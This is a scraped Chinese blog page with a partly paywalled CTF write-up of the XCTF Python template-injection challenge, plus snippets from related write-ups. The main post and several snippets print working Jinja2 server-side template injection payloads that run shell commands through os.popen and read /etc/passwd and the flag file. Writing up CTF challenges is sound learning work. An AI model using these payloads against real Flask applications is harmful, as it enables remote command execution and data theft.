[XCTF]攻防世界Web_python_template_injection模板注入

最新推荐文章于 2025-05-04 18:37:39 发布

原创

最新推荐文章于 2025-05-04 18:37:39 发布 · 3.6k 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#前端 #ctf

模板注入

在url后访问地址/{ {7*7}}
返回49
于是是模板注入

payload：

http://111.200.241.244:52204/{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{
   
   { c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls').read()") }}{% endif %}{% endfor %}

URL http://111.200.241.244:52204/fl4g index.py not found

http://111.200.241.244:52204/{% for c in [].__class__

最低0.47元/天解锁文章

200万优质内容无限畅学

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

捞氘河水怪

关注关注

3
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

攻防世界Web_python_template_injection

MIGENGKING的博客

04-23

3599

打开题目：题目提示为Python模块注入： 1首先判断一下：网址输入“{{7+7}}”页面显示14，说面存在“SSTI” ： SSTI也是获取了一个输入，然后再后端的渲染处理上进行了语句的拼接，然后执行。当然还是和sql注入有所不同的，SSTI利用的是现在的网站模板引擎(下面会提到)，主要针对python、php、java的一些网站处理框架，比如Python的jinja...

攻防世界 web高手进阶区 9分题 Web_python_flask_sql_injection

闵行小鱼塘

10-12

1192

继续ctf的旅程，开始攻防世界web高手进阶区的9分题，本文是Web_python_flask_sql_injection的writeup

参与评论您还未登录，请先登录后发表或查看评论

攻防世界XCTF：Web_python_template_injection

末初 · mochu7

03-13

823

根据题意可知python模块注入测试payload：http://111.198.29.45:31069/{{3+4}} 执行了{{}}中的代码。获取指定节点下的所有键值对 Payload: {{ [].__class__.__base__.__subclasses__()[40]('/etc/passwd').read() }} {{''.__class__.__mro__[2...

xctf Web_python_template_injection

最新发布

Furukawado的博客

05-04

1096

先看题，翻译了一下是模版注入，然后使用插件看一下发现是flask框架，注入点应该是这个。百度搜了一下大概有两个一个xss一个文件读取/命令执行有两篇较为详细的文章（虽然我没看太明白，但是确实详细，鄙人只会简单的开发知道flask框架下传值是需要{{}}的。那么先按照xss试一下，不可行但是可以发现有报错回显，开始尝试文件读取/命令执行结果如下开始找类的对象：{{''.__class__}}继续寻找基类：{{''.__class__.__mro__}}

XCTF-攻防世界CTF平台-Web类——12、Web_python_template_injection（SSTI服务器模板注入、Flask框架之Jinja2模板渲染引擎）

Onlyone_1314的博客

11-26

1768

目录标题模板引擎SSTI服务器模板注入python模板注入Flask应用框架Jinja2模板渲染引擎Python中常用于ssti的魔术方法获取基类的一些方法获取基本类的子类四种方法读取flag（1）site._Printer类调用os.popen函数执行任意命令（2）site._Printer类调用os.listdir函数执行查看本级目录下的文件（3）catch_warnings类的linecache函数执行任意命令（4）遍历基类找函数执行__import __("os").popen("ls").read

XCTF---Web_python_template_injection

weixin_45895555的博客

05-28

526

python template injection （对于出学的我来说）python模板注入不熟。所以花了一天的时间看了不少文章，也慢慢了解了Flask/Jinja2.输入后显示之后输入**{{config.items()}}是可以爆出一些内容的这里有些内容较深就不细究了，当然没法得到有利信息。之后有偿试爆了一下类（看了文章，师傅说<type ‘file’>**类，它是文件系统访问的关键但是还没找到方法，所以继续了一篇） ...

XCTF-Web-高手区-Web_python_template_injection

1stPeak's Blog

06-21

378

题目解题 1、题目提示为python模板注入猜测这里是SSTI(Server-Side Template Injection) 服务端模板注入，就是服务器模板中拼接了恶意用户输入导致各种漏洞。通过模板，Web应用可以把输入转换成特定的HTML文件或者email格式 2、测试一下 http://111.200.241.244:53038/{{1+1}} 经过该测试，说明存在SSTI 3、那么接下来可以使用相关payload进行验证（1）payload1 查看所有模块 http://111.200.

攻防世界-web高手进阶区

zji

04-25

7052

文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结攻防世界-web高手进阶区提示：这里是记录web的题目，这里我基本不讲很多细节，请自行下载Burpsuite，web使用的等等工具。一、baby_web 非常的简单，bp抓包直接把1.php去掉后，就看的flag了。二、Training-WWW-Robots 非常的简单，点网页进去后，看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php，在

20200109攻防世界WEB高手区题目一题多解全教程通关(13-18)

qq_45290991的博客

01-09

557

013unserialize3 经典的反序列化绕过wake_up魔术方法姿势，表示属性个数的值大于真实属性个数时，会绕过 _wakeup 函数的执行。我还是推荐官网的教程，实在太经典了，大爱❥(^_-)https://www.php.cn/php-weizijiaocheng-454909.html 一进去这道题，源码直接： class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?c

服务端模板注入攻击（SSTI）

pmt123456的博客

11-17

574

1、题目：Web_python_template_injection 从零学习flask模板注入关于python魔术方法payload："".__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() 的解释题解1：CTF引出对Python模板注入的思考 #找到os模块 #有两个 #我们要找的是第71个<class 'site._Printer'> num = 0 for n in ''.__class__.__m

2020.3.31 xctf(Web_python_template_injection)①

DSR446的博客

03-31

363

根据题意可知python模块注入测试payload：http://111.198.29.45:31069/{{3+4}} 执行了{{}}中的代码。 {{''.__class__.__mro__[2].__subclasses__()}} {{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].list...

python template injection_XCTF-web_python_template_injection

weixin_29906279的博客

12-30

169

web_python_template_injection这里涉及到flask的ssti漏洞(服务端模板注入)。简单点说就是，在使用flask/jinja2的模板渲染函数render_template_string的同时，使用%s来替换字符串的时候，会把字符串中被{{}}包围内容当作变量解析。例如：@app.route('/')def hello_world():return 'Hello Wor...

【攻防世界】十二、Web_python_template_injection

Hi~ 土拨鼠

09-16

1146

步骤打开所给场景，根据所给提示是python的模板注入尝试一下漏洞是否存在：payload：/{{1+1}} 发现{{}}中的表达式被执行，构造命令执行payload：{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}} 发现flag，将上述payload中的ls改为cat fl4g即可获得目标：{{''.__class__.__mro__[2].__subcl.

python模板注入_攻防世界-web-Web_python_template_injection（模板注入）

weixin_39658726的博客

01-13

204

进入场景后，显示如下页面猜测本题存在Python SSTI漏洞，验证一下，在url后面添加{{1+1}}，回车显示如下界面返回2，我们输入的1+1被执行了，说明服务器执行了{{}}里面这一段代码。所以本题思路就是先查看当前目录，发现存在一个fl4g文件，然后读取此文件，获得flag。首先，构造Payload1，查看当前目录，发现存在一个fl4g文件。{{[].__class__.__base__....

【XCTF 攻防世界】WEB 高手进阶区 Web_python_template_injection

weixin_45844670的博客

08-31

328

打开链接只有一行字提示这是python模板注入也就是说可能是jinjia2、djingo、tornado中的一个模板这里涉及到flask的ssti漏洞（服务端模板注入）。简单点说就是，在使用flask/jinja2的模板渲染函数render_template_string的同时，使用%s来替换字符串的时候，会把字符串中被{{}}包围内容当作变量解析。举个例子请求：xxxxxx.xxx/{{ 10*10 }} 响应：xxxxx.xxx/{{100}} Not Found! ...

[wp] Web_python_template_injection 攻防世界

夏日の blog

02-06

1428

打开题目我们看到提示python模板注入，尝试{{1+1}}看看{{}}是否被执行由上图可知代码被执行确实存在模板注入 1.查看所有子类 {{[].__class__.__base__.__subclasses__()}} ...

攻防世界--Web进阶--Web_python_template_injection---python模板注入---writeup

z2560088的博客

10-10

1085

- 首先看到题目，就知道这道题是关于 **模板注入** 的，什么是模板注入呢？ - 为了写 html 代码的时候方便，很多网站都会使用模板，先写好一个 html 模板文件，比如： ```python def test(): code = request.args.get('id') html = ''' <h3>%s</h3> '''%(code) return render_template_string(html) ``` 这段代码中的 `h..

攻防世界web进阶之Web_python_template_injection

胖虎很忙

10-11

3678

（1）简单探测 http://111.198.29.45:42611/{{7+7}} 返回 URL http://111.198.29.45:47259/14 not found 证明执行了这个命令，（2）http://111.198.29.45:47259/{{config.items()}} 查看系统配置；（3）读取passwd信息 {{ [].class.base.subc...

xctf web_php_include

03-29

好的，用户需要了解XCTF竞赛中与PHP include相关的Web安全漏洞的解题思路。首先，我应该回忆PHP中的文件包含漏洞，尤其是include函数的不当使用可能导致的安全问题。用户提到的引用[4]中的代码显示，$lan变量直接...